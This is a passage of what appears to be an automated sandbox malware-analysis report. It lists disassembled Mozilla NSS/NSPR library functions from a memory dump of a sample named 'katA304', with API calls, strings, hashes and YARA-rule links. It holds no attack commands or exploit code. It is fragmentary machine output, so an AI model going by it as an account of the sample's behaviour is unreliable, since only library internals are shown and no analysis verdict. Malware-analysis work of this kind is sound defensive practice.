                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8e77bdbee0021b4849bcc57c4450a8729193d6d51c4ab0bb448148bf713fae8b
                                                            • Instruction ID: da534a95be8be2aa879973893c63e5c701e6258dbf16a28dc58c4e6c1c0a9392
                                                            • Opcode Fuzzy Hash: 8e77bdbee0021b4849bcc57c4450a8729193d6d51c4ab0bb448148bf713fae8b
                                                            • Instruction Fuzzy Hash: 1611C132A052158FE748DF26D88475AB3A9FF4331CF08426AD8258FA41C775E897C7C9
                                                            Function 6CAD0C40 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe49e82fb1784c49aad7ff11dd2620deccc4e733bcf79d31be4824fc86bfbdeb
                                                            • Instruction ID: 4c8465332af17b2a35433afe6ac9b11f991c81ec95cec4388e4d8ef06b224443
                                                            • Opcode Fuzzy Hash: fe49e82fb1784c49aad7ff11dd2620deccc4e733bcf79d31be4824fc86bfbdeb
                                                            • Instruction Fuzzy Hash: AA11E0747043459FCB00DF28D8806AA7BB6FF85368F19846DD8198B701DB71E846CBA0
                                                            Function 6CAD0D60 Relevance: .0, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                            • Instruction ID: 2fc57d74948808102678778622703d1d1483c644b83d4097e07a550f8bb9df96
                                                            • Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
                                                            • Instruction Fuzzy Hash: 68E0923A202054A7DB148E09D450AAA7369DF81619FBA807FCC9D9FA01E733F8838781
                                                            Function 6C9FCC60 Relevance: .0, Instructions: 8COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bdb89f01f4b5b63c11db3395900d91c0bdb7820f2c5f4b33734187620d4d5fab
                                                            • Instruction ID: c9b4fdd7253ea4d50ed5d4694e6e6ec8fa7e49d90472071d5468226aa1bf115c
                                                            • Opcode Fuzzy Hash: bdb89f01f4b5b63c11db3395900d91c0bdb7820f2c5f4b33734187620d4d5fab
                                                            • Instruction Fuzzy Hash: 38C04838248A08CFC704DE09E4A99A43BA8AB0AA107040094EA428B761DA21F800CA80
                                                            Function 6CA31D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6CA31D46), ref: 6CA32345
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print
                                                            • String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
                                                            • API String ID: 3558298466-1980531169
                                                            • Opcode ID: 1e588da9b09e9dc23a902fe2b953ce10fb81e1f976214c9b153ce5c8ea2222de
                                                            • Instruction ID: a226c27cbf177faac7dc5d14bb362e521690a06c775fccd0c0ce7c348d4ade31
                                                            • Opcode Fuzzy Hash: 1e588da9b09e9dc23a902fe2b953ce10fb81e1f976214c9b153ce5c8ea2222de
                                                            • Instruction Fuzzy Hash: D361C93068D4A486E6284C4C85BA37C6124AB02304F6CF337F78ECEE9BD695CAD556D7
                                                            Function 6CA65DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6CA65E08
                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CA65E3F
                                                            • PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6CA65E5C
                                                            • free.MOZGLUE(00000000), ref: 6CA65E7E
                                                            • free.MOZGLUE(00000000), ref: 6CA65E97
                                                            • PORT_Strdup_Util.NSS3(secmod.db), ref: 6CA65EA5
                                                            • _NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6CA65EBB
                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CA65ECB
                                                            • PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6CA65EF0
                                                            • free.MOZGLUE(00000000), ref: 6CA65F12
                                                            • NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6CA65F35
                                                            • PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6CA65F5B
                                                            • free.MOZGLUE(00000000), ref: 6CA65F82
                                                            • PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6CA65FA3
                                                            • PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6CA65FB7
                                                            • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6CA65FC4
                                                            • free.MOZGLUE(00000000), ref: 6CA65FDB
                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CA65FE9
                                                            • free.MOZGLUE(00000000), ref: 6CA65FFE
                                                            • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6CA6600C
                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA66027
                                                            • PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6CA6605A
                                                            • PR_smprintf.NSS3(6CB3AAF9,00000000), ref: 6CA6606A
                                                            • free.MOZGLUE(00000000), ref: 6CA6607C
                                                            • free.MOZGLUE(00000000), ref: 6CA6609A
                                                            • free.MOZGLUE(00000000), ref: 6CA660B2
                                                            • free.MOZGLUE(?), ref: 6CA660CE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
                                                            • String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
                                                            • API String ID: 1427204090-154007103
                                                            • Opcode ID: 11c360a6428248ecbab341fdc688ee6615273fe641b9bb5ecc4fea144de404af
                                                            • Instruction ID: 31ce0c0f3520b3268f13c37c18b3811ed591f40e2e6c3ec824e10ec150badb8b
                                                            • Opcode Fuzzy Hash: 11c360a6428248ecbab341fdc688ee6615273fe641b9bb5ecc4fea144de404af
                                                            • Instruction Fuzzy Hash: DE91C6F4A042515BEF018F26DC81BAA3BB89F0625CF1C0061EC59DBF42E735D995CBA2
                                                            Function 6C9F1D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_NewLock.NSS3 ref: 6C9F1DA3
                                                              • Part of subcall function 6CAC98D0: calloc.MOZGLUE(00000001,00000084,6C9F0936,00000001,?,6C9F102C), ref: 6CAC98E5
                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C9F1DB2
                                                              • Part of subcall function 6C9F1240: TlsGetValue.KERNEL32(00000040,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1267
                                                              • Part of subcall function 6C9F1240: EnterCriticalSection.KERNEL32(?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F127C
                                                              • Part of subcall function 6C9F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F1291
                                                              • Part of subcall function 6C9F1240: PR_Unlock.NSS3(?,?,?,?,6C9F116C,NSPR_LOG_MODULES), ref: 6C9F12A0
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C9F1DD8
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C9F1E4F
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C9F1EA4
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C9F1ECD
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C9F1EEF
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C9F1F17
                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C9F1F34
                                                            • PR_SetLogBuffering.NSS3(00004000), ref: 6C9F1F61
                                                            • PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C9F1F6E
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C9F1F83
                                                            • PR_SetLogFile.NSS3(00000000), ref: 6C9F1FA2
                                                            • PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C9F1FB8
                                                            • OutputDebugStringA.KERNEL32(00000000), ref: 6C9F1FCB
                                                            • free.MOZGLUE(00000000), ref: 6C9F1FD2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
                                                            • String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
                                                            • API String ID: 2013311973-4000297177
                                                            • Opcode ID: 0a2fc610866f8ec99fa887ed5b9bb6255c93b96d246862ab2ff898c7f5e3babd
                                                            • Instruction ID: b93a52e9ea1405c38b468b981c00ed19f476e20eb04ab8914f1393e4ad2ba53c
                                                            • Opcode Fuzzy Hash: 0a2fc610866f8ec99fa887ed5b9bb6255c93b96d246862ab2ff898c7f5e3babd
                                                            • Instruction Fuzzy Hash: EC51C0B1E042599BEF00DFE5DC48B9E77B8AF16308F180528E829DBA40E770E559CB91
                                                            Function 6CA64C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64C50
                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64C5B
                                                            • PR_smprintf.NSS3(6CB3AAF9,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64C76
                                                            • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64CAE
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA64CC9
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA64CF4
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA64D0B
                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64D5E
                                                            • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CA54F51,00000000), ref: 6CA64D68
                                                            • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CA64D85
                                                            • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CA64DA2
                                                            • free.MOZGLUE(?), ref: 6CA64DB9
                                                            • free.MOZGLUE(00000000), ref: 6CA64DCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: free$R_smprintf$strlen$Alloc_Util
                                                            • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                            • API String ID: 3756394533-2552752316
                                                            • Opcode ID: 60f8379e28049ad286db0445805730a4170e2e39d3b6e339ffe48ef4ca3ae887
                                                            • Instruction ID: 98b03ff87446dd8608581695b476c47fe1161ae865680041e7814780d554ef94
                                                            • Opcode Fuzzy Hash: 60f8379e28049ad286db0445805730a4170e2e39d3b6e339ffe48ef4ca3ae887
                                                            • Instruction Fuzzy Hash: 054179B1D00181ABDB12DF5ADC54ABF3A65AF9634CF584124E81A5BF01EB31D8A4C7D3
                                                            Function 6CA0DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PORT_NewArena_Util.NSS3(00000800), ref: 6CA0DDDE
                                                              • Part of subcall function 6CA60FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA087ED,00000800,6C9FEF74,00000000), ref: 6CA61000
                                                              • Part of subcall function 6CA60FF0: PR_NewLock.NSS3(?,00000800,6C9FEF74,00000000), ref: 6CA61016
                                                              • Part of subcall function 6CA60FF0: PL_InitArenaPool.NSS3(00000000,security,6CA087ED,00000008,?,00000800,6C9FEF74,00000000), ref: 6CA6102B
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6CA0DDF5
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA610F3
                                                              • Part of subcall function 6CA610C0: EnterCriticalSection.KERNEL32(?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6110C
                                                              • Part of subcall function 6CA610C0: PL_ArenaAllocate.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61141
                                                              • Part of subcall function 6CA610C0: PR_Unlock.NSS3(?,?,?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA61182
                                                              • Part of subcall function 6CA610C0: TlsGetValue.KERNEL32(?,6CA08802,00000000,00000008,?,6C9FEF74,00000000), ref: 6CA6119C
                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6CA0DE34
                                                            • PR_Now.NSS3 ref: 6CA0DE93
                                                            • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6CA0DE9D
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA0DEB4
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA0DEC3
                                                            • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CA0DED8
                                                            • PR_smprintf.NSS3(%s%s,?,?), ref: 6CA0DEF0
                                                            • PR_smprintf.NSS3(6CB3AAF9,(NULL) (Validity Unknown)), ref: 6CA0DF04
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA0DF13
                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CA0DF22
                                                            • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6CA0DF33
                                                            • free.MOZGLUE(00000000), ref: 6CA0DF3C
                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA0DF4B
                                                            • free.MOZGLUE(00000000), ref: 6CA0DF74
                                                            • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA0DF8E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                            • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                            • API String ID: 1882561532-3437882492
                                                            • Opcode ID: f11affb34c49e890fa69f44da12d9e838c59b05e6214be3ab7fea83b480f1c85
                                                            • Instruction ID: d829377fd017064d32da9f41bff18fe2045b28dfba6e44600499273778c866d9
                                                            • Opcode Fuzzy Hash: f11affb34c49e890fa69f44da12d9e838c59b05e6214be3ab7fea83b480f1c85
                                                            • Instruction Fuzzy Hash: DB5194B2E002555BDF00DE65AD41ABF7BB9AF9539CF184028E809E7B00E731D955CBE1
                                                            Function 6CA42D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CA42DEC
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CA42E00
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CA42E2B
                                                            • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CA42E43
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C,?,-00000001,00000000,?), ref: 6CA42E74
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CA14F1C,?,-00000001,00000000), ref: 6CA42E88
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA42EC6
                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA42EE4
                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA42EF8
                                                            • PR_Unlock.NSS3(?), ref: 6CA42F62
                                                            • TlsGetValue.KERNEL32 ref: 6CA42F86
                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6CA42F9E
                                                            • PR_Unlock.NSS3(?), ref: 6CA42FCA
                                                            • TlsGetValue.KERNEL32 ref: 6CA4301A
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CA4302E
                                                            • PR_Unlock.NSS3(?), ref: 6CA43066
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA43085
                                                            • PR_Unlock.NSS3(?), ref: 6CA430EC
                                                            • TlsGetValue.KERNEL32 ref: 6CA4310C
                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6CA43124
                                                            • PR_Unlock.NSS3(?), ref: 6CA4314C
                                                              • Part of subcall function 6CA29180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CA5379E,?,6CA29568,00000000,?,6CA5379E,?,00000001,?), ref: 6CA2918D
                                                              • Part of subcall function 6CA29180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CA5379E,?,6CA29568,00000000,?,6CA5379E,?,00000001,?), ref: 6CA291A0
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07AD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07CD
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C98204A), ref: 6C9F07D6
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C98204A), ref: 6C9F07E4
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,6C98204A), ref: 6C9F0864
                                                              • Part of subcall function 6C9F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C9F0880
                                                              • Part of subcall function 6C9F07A0: TlsSetValue.KERNEL32(00000000,?,?,6C98204A), ref: 6C9F08CB
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08D7
                                                              • Part of subcall function 6C9F07A0: TlsGetValue.KERNEL32(?,?,6C98204A), ref: 6C9F08FB
                                                            • PR_SetError.NSS3(00000000,00000000), ref: 6CA4316D
                                                            Memory Dump Source
